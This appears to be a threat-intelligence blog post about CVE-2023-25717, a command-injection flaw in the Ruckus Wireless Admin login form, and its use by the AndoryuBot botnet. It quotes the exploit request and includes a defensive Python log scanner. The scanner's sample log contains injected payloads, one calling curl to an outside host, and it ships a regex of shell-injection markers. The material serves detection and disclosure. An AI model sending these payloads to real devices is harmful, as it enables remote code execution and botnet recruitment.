Ruckus Wireless Products in the Crosshairs
On February 8th, 2023, the vendor alerted customers to a security vulnerability in Ruckus Wireless Admin. CVE-2023-25717 is a critical Remote Code Execution (RCE) vulnerability affecting the Ruckus Wireless Admin interface.
The vulnerability stems from inadequate handling of a specially crafted HTTP request. As indicated by the NVD vulnerability description and the publicly available POC, it is exploited by sending the following HTTP GET request:
"/forms/doLogin?login_username=admin&password=password$(curl substring)"
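As an added example (not from the Cyble post), the following Python scans web-server access-log lines for requests to the login path above whose parameters carry shell command-substitution markers once URL decoding is undone; the log lines and IP addresses are constructed, and the log format is assumed to be Apache/nginx combined format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format). Lines 2, 3 and 5
# carry shell metacharacters in the password field; the others are benign.
SAMPLE_LOG = r"""
192.0.2.10 - - [17/May/2023:10:01:02 +0000] "GET /forms/doLogin?login_username=admin&password=Summer2023 HTTP/1.1" 200 512
192.0.2.11 - - [17/May/2023:10:01:05 +0000] "GET /forms/doLogin?login_username=admin&password=password$(curl%20http://203.0.113.5/x) HTTP/1.1" 200 512
192.0.2.12 - - [17/May/2023:10:01:09 +0000] "GET /forms/doLogin?login_username=admin&password=pw%24%28id%29 HTTP/1.1" 200 512
192.0.2.13 - - [17/May/2023:10:02:00 +0000] "GET /forms/index.html HTTP/1.1" 200 1024
192.0.2.14 - - [17/May/2023:10:02:30 +0000] "GET /forms/doLogin?login_username=guest&password=a%60id%60 HTTP/1.1" 200 512
"""

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell command substitution and command chaining markers that have
# no legitimate place in a login form parameter.
INJECTION_RE = re.compile(r'\$\(|`|\$\{|;|\|\||&&')

def suspicious_login_requests(log_text):
    """Return (client_ip, parameter, decoded_value) for every request to
    /forms/doLogin whose login parameters contain shell metacharacters."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        parts = urlsplit(m.group("target"))
        if parts.path != "/forms/doLogin":
            continue
        # parse_qs percent-decodes, so an encoded %24%28 and a literal $( are
        # both seen as "$(" here; matching on the raw URL would miss the former.
        params = parse_qs(parts.query, keep_blank_values=True)
        for key in ("login_username", "password"):
            for value in params.get(key, []):
                if INJECTION_RE.search(value):
                    hits.append((m.group("ip"), key, value))
    return hits

if __name__ == "__main__":
    for ip, key, value in suspicious_login_requests(SAMPLE_LOG):
        print(f"{ip} sent shell metacharacters in {key}: {value!r}")
```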
The Cyble Global Sensor Network (CGSI) observed active exploitation of CVE-2023-25717 and deployment of AndoryuBot, as shown in the image below. This incident indicates that Threat Actors (TAs) are actively looking for vulnerable Ruckus assets for exploitation purposes.
Since the Proof of Concept (POC) for the vulnerability is publicly available, we expect that Threat Actors (TAs) will exploit this vulnerability on a large scale. On May 8th, 2023, Fortinet released a blog stating, "AndoryuBot distributing through Ruckus Vulnerability". The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-25717 to its Known Exploited Vulnerabilities catalog on May 15th, 2023.
AndoryuBot is a new Botnet malware sold on Telegram on a subscription basis. The deployment of such malware by TAs allows them to orchestrate large-scale DDoS attacks, which can overwhelm targeted servers and infrastructure by flooding them with a massive volume of traffic.
Exposure of Ruckus Wireless Admin Panel
As the vulnerability falls under the critical severity category and is being used by AndoryuBot, researchers at Cyble investigated one of the online scanners for internet-exposed Ruckus Wireless Admin panels. They found that there are ~52k instances exposed over the internet.
The figure below represents the geographical distribution of internet-exposed instances.
The graph below shows the Top 5 countries with the highest number of exposed assets.
AndoryuBot Analysis
Continuous monitoring and logging can help in detecting network anomalies early.
MITRE ATT&CK® Techniques
| Tactic | Technique ID | Technique Name |
| --- | --- | --- |
| Execution | T1059 | Command and Scripting Interpreter |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
| Defense Evasion | T1480 | Execution Guardrails |
| Defense Evasion | T1036 | Masquerading |
| Privilege Escalation | T1055 | Process Injection |
| Command and Control | T1095 | Non-Application Layer Protocol |
Indicators of Compromise (IoCs):
Source: https://blog.cyble.com/2023/05/17/andoryubots-ddos-rampage/